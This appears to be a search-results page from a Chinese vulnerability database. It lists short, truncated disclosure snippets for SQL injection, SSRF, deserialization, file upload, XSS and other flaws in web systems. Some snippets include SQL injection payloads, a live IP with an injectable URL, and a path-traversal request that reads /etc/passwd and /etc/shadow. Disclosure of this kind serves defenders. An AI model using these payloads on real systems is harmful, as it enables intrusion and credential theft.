56796 matches found
xpshop网店系统 xpshop.webui.Show SQL 注入
漏洞位置xpshop.webui.Show: private void GetImgstring pids ProductDB productDB = new ProductDB; DataTable thumbnailImg = productDB.GetThumbnailImgpids; thumbnailImg.TableName = "Products"; base.Response.WriteXpShopJson.DtToJSONthumbnailImg; 这里是问题函数,我就不写怎么跟进来的,就是pageload,等下直接用payload测试就好了,官网demo的。...
用友某系统漏洞(SSRF&Java反序列化命令执行漏洞)
简要描述: 1.SSRF内网信息嗅探; 2.Java反序列化命令执行:获取系统权限。 详细说明: 用友私有云运营中心 http://219.232.202.154:8080//home 部署的weblogic: 漏洞证明: 1.SSRF 默认搜索页面存在: 结合http://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html,以localhost为例进行测试: 2.Java反序列化命令执行 测试EXP:...
PHP Utility Belt - Remote 代码执行
No description provided by source...
Atlassian HipChat for Jira Plugin Velocity 模版注入
No description provided by source...
Red Hat Automatic Bug Reporting Tool任意文件写入漏洞
问题在abrt-action-install-debuginfo-to-abrt-cache 在默认的情况下,它会在/var/tmp/abrt-tmp-debuginfo-RANDOMSUFFIX创建一个临时文件,然后会下载rpm文件到这个文件夹,之后会进行解压,因为是临时文件夹,所以解压的路径不是这个,而是在/var/cache/abrt-di,但是因为这个文件夹并不是随机创建的,而且可预测性极强,所以我们可以提前创建这个文件夹,依靠控制unpacked.cpio这个文件,我们就能欺骗abrt-action-install-debuginfo提取一个我们可控制的cpio文件...
Red Hat Automatic Bug Reporting Tool权限获取漏洞
No description provided by source...
iniNet SpiderControl PLC Editor Simatic 6.30.04 - Insecure File Permissions
No description provided by source...
OpenMRS 2.3 (1.11.4) - 文件泄漏漏洞
No description provided by source. OpenMRS 2.3 1.11.4 Local File Disclosure Vulnerability Vendor: OpenMRS Inc. Product web page: http://www.openmrs.org Affected version: OpenMRS 2.3, 2.2, 2.1, 2.0 Platform 1.11.4 Build 6ebcaf, 1.11.2 and 1.10.0 OpenMRS-TB System OpenMRS 1.9.7 Build 60bd9b Summary...
OpenMRS 2.3 (1.11.4) - 多个跨站脚本漏洞
No description provided by source. OpenMRS 2.3 1.11.4 Multiple Cross-Site Scripting Vulnerabilities Vendor: OpenMRS Inc. Product web page: http://www.openmrs.org Affected version: OpenMRS 2.3, 2.2, 2.1, 2.0 Platform 1.11.4 Build 6ebcaf, 1.11.2 and 1.10.0 OpenMRS-TB System OpenMRS 1.9.7 Build 60bd...
多款F5产品权限获取漏洞
No description provided by source...
OpenLDAP 弱密码
No description provided by source...
PuTTY整数溢出漏洞
No description provided by source...
LXCFS权限获取漏洞(CNVD-2015-07988)
No description provided by source...
2345王牌输入法本地权限提升漏洞
Microsoft Windows API使用CreateProcess函数创建新的进程及其主线程。 CreateProcess函数的格式如下: BOOL CreateProcess LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITYATTRIBUTES lpProcessAttributes, LPSECURITYATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCTST...
Google Chrome 'opj_dwt_decode_1*'拒绝服务漏洞
No description provided by source...
Sqlmap 代码执行
前言 于2015年01月27日, 我在阅读最新版本Sqlmap代码时,发现其存在代码执行问题。安全问题由 python 的 pickle 导致。 pickle 模块实现了一个基础而强劲的算法,用于序列化和反序列化 Python 对象结构,常用于跨平台及网络应用。在进行反序列化操作时,pickle 会执行精心构造的 python 代码。 漏洞演示 测试数据: python sqlmap.py --pickled-options...
Shopv8商城系统 v10.48 SQL注入漏洞
No description provided by source...
Sensio Labs Symfony会话固定漏洞
No description provided by source...
Google Chrome 'ContainerNode::notifyNodeInsertedInternal'内存错误引用漏洞
No description provided by source...
Google Chrome DOM同源策略绕过漏洞
No description provided by source...
Google Chrome sfntly整数溢出漏洞
No description provided by source...
phpFileManager 0.9.8 Remote 代码执行
No description provided by source...
大汉网络 JCMS que_style_coltop.jsp SQL注入漏洞
No description provided by source...
LXCFS权限获取漏洞
No description provided by source...
连邦政务系统 dtl.aspx SQL注入漏洞
No description provided by source...
WordPress Polls Widget Plugin 1.0.7 - SQL注入 漏洞
No description provided by source...
Elasticsearch Kibana跨站请求伪造漏洞
No description provided by source...
Google Chrome V8拒绝服务漏洞(CNVD-2015-07961)
No description provided by source...
libreport信息泄露漏洞
No description provided by source...
dotCMS 3.2.4 - 多个 漏洞
No description provided by source...
Google Chrome HTML注入漏洞
No description provided by source...
Blue Coat Systems ProxySG SGOS信息泄露漏洞
No description provided by source...
霍尼韦尔Midas气体检测器密码明文传输漏洞
No description provided by source...
用友ICC系统 任意文件上传漏洞
ZoomEye 探测结果显示,以下厂商均受该漏洞影响 中国地保险 中国保险在线客服 中国银网络客户服务 国基金管理有限公司 银行信用卡职能客服 人寿在线客服 同全球在线客服 中国联在线客服 上海信 山网络 娱网在线客服 顺游戏客户服务系统 官方商城在线客服...
LuManager 2.0.99 /Lib/Action/PublicAction.php 参数 user SQL 注入
No description provided by source...
霍尼韦尔Midas气体检测器路径遍历漏洞
No description provided by source...
用友GRP系统sql注射
简要描述: 用友GRP系统sql注射 详细说明: 用友GRP系统sql注射 链接:http://221.2.68.102:8888/R9iPortal/cm/cminfocontent.jsp?infoid=42 注射参数: Payload: infoid=-7911 UNION ALL SELECT 78,78,78,78,78,78,78,78,78,78,78,78, CHAR113+CHAR98+CHAR113+CHAR118+CHAR113+CHAR74+CHAR98+CHAR75+CHAR...
ESPCMS二次注入最新版DEMO成功(反序列化注入)
简要描述: RT 听说通用改版了 写的有点乱,要是看不清楚,可以先看后面的注入点的分析,再来看绕过GPC!! 详细说明: 在文件 \interface\order.php function inorderupdae $bprice = $this-fun-accept'bprice', 'P'; $didlist = $this-fun-accept'did', 'P'; $amountlist = $this-fun-accept'amount', 'P'; foreach $didlist as $key = $value $arraykeyname = 'k' . $value;...
BookingeCMS HotelCMS酒店预订管理系统provinceId参数存在注入
0x01 漏洞简述 提交时间: 2015-09-04 13:33 公开时间: 2015-12-06 09:00 漏洞类型: SQL注射漏洞 珠海中新信息科技有限公司开发的BookingeCMS HotelCMS /?m=city.getCity 文件provinceId参数存在注入 0x02 漏洞利用 测试Payload: (post提交) /?m=city.getCity provinceId=1' AND SELECT 7525 FROMSELECT COUNT,CONCAT0x7c,MIDIFNULLCASTCURRENTUSER AS...
BookingeCMS HotelCMS酒店预订管理系统cityName参数存在注入
0x01 漏洞简述 提交时间: 2015-09-04 13:33 公开时间: 2015-12-06 09:00 漏洞类型: SQL注射漏洞 珠海中新信息科技有限公司开发的BookingeCMS HotelCMS /?m=hotel.setSearchSession 文件cityName参数存在注入 0x02 漏洞利用 测试Payload: (post提交) /?m=hotel.setSearchSession cityName=&type=getCityId&cityName=%E7%A6%8F%E5%B7%9E%' AND SELECT 4965 FROMSELECT...
BookingeCMS HotelCMS酒店预订管理系统rewrite参数SQL注入
0x01 漏洞简述 提交时间: 2015-09-04 13:33 公开时间: 2015-12-06 09:00 漏洞类型: SQL注射漏洞 珠海中新信息科技有限公司开发的BookingeCMS HotelCMS /?m=info&rewrite=1 文件rewrite参数存在注入 0x02 漏洞利用 测试Payload: (get提交) ?m=info&rewrite=1' UNION ALL SELECT CONCAT0x7c,IFNULLCASTCURRENTUSER AS CHAR,0x20,0x7c,NULL%23 0x03 参考链接...
BookingeCMS HotelCMS酒店预订管理系统hotelId参数存在注入
0x01 漏洞简述 提交时间: 2015-09-04 13:33 公开时间: 2015-12-06 09:00 漏洞类型: SQL注射漏洞 珠海中新信息科技有限公司开发的BookingeCMS HotelCMS /?m=hotel.getHotelInfo 文件hotelId参数存在注入 0x02 漏洞利用 测试Payload: (post提交) /?m=hotel.getHotelInfo hotelId=11 AND SELECT 6261 FROMSELECT COUNT,CONCAT0x7c,MIDIFNULLCASTDATABASE AS...
大汉网络JCMS module/voting/down.jsp任意文件下载
权限没设置好,导致可以枚举文件名下载文件 /jcms/m5e/module/voting/down.jsp?filename=username&pathfile=/etc/passwd pathfile就对着自己的linux输入就行了,这里测试了几个 /etc/shadow /etc/shadow...
大汉jcms /lm/sys/opr_uploadimg.jsp 文件上传漏洞
No description provided by source...
BookingeCMS HotelCMS酒店预订管理系统account参数SQL注入
0x01 漏洞简述 提交时间: 2015-09-04 13:33 公开时间: 2015-12-06 09:00 漏洞类型: SQL注射漏洞 珠海中新信息科技有限公司开发的BookingeCMS HotelCMS /?m=login.checkAccount&account= 文件account参数存在注入 0x02 漏洞利用 测试Payload: (get提交) /?m=login.checkAccount&account= /?m=login.checkAccount&account= ' AND SELECT 9468 FROMSELECT...
rockoa v2.1.8 webrock\webim\record\recordAction.php 页面存在SQL
No description provided by source...
Discuz! 链接格子插件 v2.5.1 存储型 XSS 漏洞
Discuz!X2.0,X2.5,X3.0,X3.1,X3.2版本的插件存储型XSS漏洞 0x1 背景 先看看这个图。。信息量好强大 0x2 过程 所有安装都是默认的。 然后在前台点击购买广告位 文字内容插入以下XSS payload看看 " 但是我抓包直接fuzz的时候。。。 看见了iframe标签没有过滤,那么在后台看了下广告记录 漏洞证明: 参考链接: http://www.wooyun.org/bugs/wooyun-2010-0115795/ 原创:泳少@乌云...
金蝶K3财务软件系统任意文件上传demo测试成功
简要描述: 最近公司也买了这系统,对系统测试了下发现存在漏洞,官网demo同样存在这漏洞。 财务系统如果对外了被拿权限了确实很麻烦。 详细说明: 漏洞地址 http://.../k3cloud/ 漏洞代码如下 public void ProcessRequestHttpContext context try context.Response.ContentType = "text/plain"; string physicalPath = context.Request.Headers"filefolder"; if string.IsNullOrEmptyphysicalPath...
Lenovo System Update竞争条件漏洞
No description provided by source...
Cyrus IMAP index_urlfetch信息泄露漏洞
受影响系统: cyrus Cyrus IMAP Server 2.5.x-2.5.4 cyrus Cyrus IMAP Server 2.4.x-2.4.18 cyrus Cyrus IMAP Server 2.3.x-2.3.19 漏洞详情: CVECAN ID: CVE-2015-8076 Cyrus IMAP服务器是卡耐基梅隆大学开发的电子邮件服务器。 Cyrus IMAP 2.3.x-2.3.19, 2.4.x-2.4.18, 2.5.x-2.5.4...